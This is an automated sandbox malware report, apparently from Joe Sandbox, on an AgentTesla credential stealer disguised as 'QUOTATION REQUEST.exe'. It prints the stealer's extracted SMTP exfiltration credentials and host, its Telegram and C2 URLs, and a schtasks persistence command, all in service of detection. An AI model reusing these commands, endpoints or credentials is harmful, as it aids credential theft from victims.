Loading ...

Play interactive tourEdit tour

Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Sample Name:QUOTATION REQUEST.exe
Analysis ID:321450
MD5:4f4f697adc79894ceec42d5752b2790e
SHA1:390de0e89b8c1c3d07dbd12dbb0149626453d12b
SHA256:dc0cff9e3bc575333097988f46e46f1925cedf35329a749a642576601a45674c
Tags:AgentTeslaexe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • QUOTATION REQUEST.exe (PID: 5388 cmdline: 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: 4F4F697ADC79894CEEC42D5752B2790E)
    • schtasks.exe (PID: 5616 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 1564 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • lEmohP.exe (PID: 3288 cmdline: 'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • lEmohP.exe (PID: 5788 cmdline: 'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "NzslbU4cHkctpk", "URL: ": "http://C0BJotQhI3.net", "To: ": "", "ByHost: ": "mail.hemetek.com:587", "Password: ": "FYw6n", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.212271069.0000000002B21000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: QUOTATION REQUEST.exe PID: 5388JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Scheduled temp file as task from temp locationShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' , ParentImage: C:\Users\user\Desktop\QUOTATION REQUEST.exe, ParentProcessId: 5388, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp', ProcessId: 5616

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: RegSvcs.exe.1564.3.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "NzslbU4cHkctpk", "URL: ": "http://C0BJotQhI3.net", "To: ": "", "ByHost: ": "mail.hemetek.com:587", "Password: ": "FYw6n", "From: ": ""}
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\GtVSibeZGs.exeReversingLabs: Detection: 51%
              Multi AV Scanner detection for submitted fileShow sources
              Source: QUOTATION REQUEST.exeVirustotal: Detection: 52%Perma Link
              Source: QUOTATION REQUEST.exeReversingLabs: Detection: 51%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\GtVSibeZGs.exeJoe Sandbox ML: detected
              Machine Learning detection for sampleShow sources
              Source: QUOTATION REQUEST.exeJoe Sandbox ML: detected
              Source: 3.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49738 -> 107.6.134.138:587
              Source: global trafficTCP traffic: 192.168.2.3:49738 -> 107.6.134.138:587
              Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
              Source: global trafficTCP traffic: 192.168.2.3:49738 -> 107.6.134.138:587
              Source: unknownDNS traffic detected: queries for: mail.hemetek.com
              Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: RegSvcs.exe, 00000003.00000002.465723831.0000000003696000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.465745478.00000000036A0000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.465591581.0000000003659000.00000004.00000001.sdmpString found in binary or memory: http://C0BJotQhI3.net
              Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpString found in binary or memory: http://TDhznh.com
              Source: RegSvcs.exe, 00000003.00000002.465723831.0000000003696000.00000004.00000001.sdmpString found in binary or memory: http://mail.hemetek.com
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
              Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212843504.0000000003B43000.00000004.00000001.sdmp, RegSvcs.exe, 00000003.00000002.462144655.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: RegSvcs.exe, 00000003.00000002.464101728.0000000003331000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: QUOTATION REQUEST.exe, 00000000.00000002.211719629.0000000000CB8000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              Spam, unwanted Advertisements and Ransom Demands:

              barindex
              Modifies the hosts fileShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

              System Summary:

              barindex
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: QUOTATION REQUEST.exe
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_00F3EB70
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_00F3EB60
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_00F3CB5C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06835AA7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06839BB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06835078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0683F3CB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0683A300
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068324B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06831108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06833938
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              Source: QUOTATION REQUEST.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: GtVSibeZGs.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212172469.0000000002AA1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEXkkZFSEjYYVxfCzJogyqTqLgVaACqjcpHF.exe( vs QUOTATION REQUEST.exe
              Source: QUOTATION REQUEST.exe, 00000000.00000002.211719629.0000000000CB8000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION REQUEST.exe
              Source: QUOTATION REQUEST.exe, 00000000.00000002.214965035.0000000005020000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs QUOTATION REQUEST.exe
              Source: QUOTATION REQUEST.exe, 00000000.00000002.216250775.0000000006940000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs QUOTATION REQUEST.exe
              Source: QUOTATION REQUEST.exe, 00000000.00000002.211308175.0000000000542000.00000002.00020000.sdmpBinary or memory string: OriginalFilename6 vs QUOTATION REQUEST.exe
              Source: QUOTATION REQUEST.exe, 00000000.00000002.216699272.0000000006A30000.00000002.00000001.sdmpBinary or memory string: originalfilename vs QUOTATION REQUEST.exe
              Source: QUOTATION REQUEST.exe, 00000000.00000002.216699272.0000000006A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs QUOTATION REQUEST.exe
              Source: QUOTATION REQUEST.exe, 00000000.00000002.212271069.0000000002B21000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs QUOTATION REQUEST.exe
              Source: QUOTATION REQUEST.exe, 00000000.00000002.215096302.00000000050B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_rc.dllT vs QUOTATION REQUEST.exe
              Source: QUOTATION REQUEST.exeBinary or memory string: OriginalFilename6 vs QUOTATION REQUEST.exe
              Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@10/8@1/1
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeFile created: C:\Users\user\AppData\Roaming\GtVSibeZGs.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeMutant created: \Sessions\1\BaseNamedObjects\FZGqCPCXaSyGOD
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4576:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeFile created: C:\Users\user\AppData\Local\Temp\tmpCA2.tmpJump to behavior
              Source: QUOTATION REQUEST.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: QUOTATION REQUEST.exe, 00000000.00000000.194037544.00000000003C2000.00000002.00020000.sdmpBinary or memory string: UPDATE [sms].[dbo].[person]set email=@email, street=@street, city=@city, district=@district, zip=@zip WHERE id=;Student Information updated!!
              Source: QUOTATION REQUEST.exeVirustotal: Detection: 52%
              Source: QUOTATION REQUEST.exeReversingLabs: Detection: 51%
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeFile read: C:\Users\user\Desktop\QUOTATION REQUEST.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION REQUEST.exe 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe 'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe'
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe 'C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe'
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: QUOTATION REQUEST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: QUOTATION REQUEST.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: QUOTATION REQUEST.exeStatic file information: File size 1733120 > 1048576
              Source: QUOTATION REQUEST.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x13d000
              Source: QUOTATION REQUEST.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000003.335768615.00000000063F7000.00000004.00000001.sdmp, lEmohP.exe, 00000007.00000000.271543605.0000000000642000.00000002.00020000.sdmp, lEmohP.exe, 00000010.00000002.290702396.00000000005A2000.00000002.00020000.sdmp, lEmohP.exe.3.dr
              Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: lEmohP.exe, 00000010.00000002.291188421.0000000002940000.00000002.00000001.sdmp
              Source: Binary string: RegSvcs.pdb source: lEmohP.exe, lEmohP.exe.3.dr

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: QUOTATION REQUEST.exe, ?R?Xa?U??b??/u?sXwvU?tjxKO.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.QUOTATION REQUEST.exe.3c0000.0.unpack, ?R?Xa?U??b??/u?sXwvU?tjxKO.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.QUOTATION REQUEST.exe.3c0000.0.unpack, ?R?Xa?U??b??/u?sXwvU?tjxKO.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_00F31C8B push ebx; iretd
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_00F3DF50 push eax; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.33255664693
              Source: initial sampleStatic PE information: section name: .text entropy: 7.33255664693
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exeJump to dropped file
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeFile created: C:\Users\user\AppData\Roaming\GtVSibeZGs.exeJump to dropped file

              Boot Survival:

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GtVSibeZGs' /XML 'C:\Users\user\AppData\Local\Temp\tmpCA2.tmp'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run lEmohPJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run lEmohPJump to behavior

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\lEmohP\lEmohP.exe:Zone.Identifier read attributes | delete
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
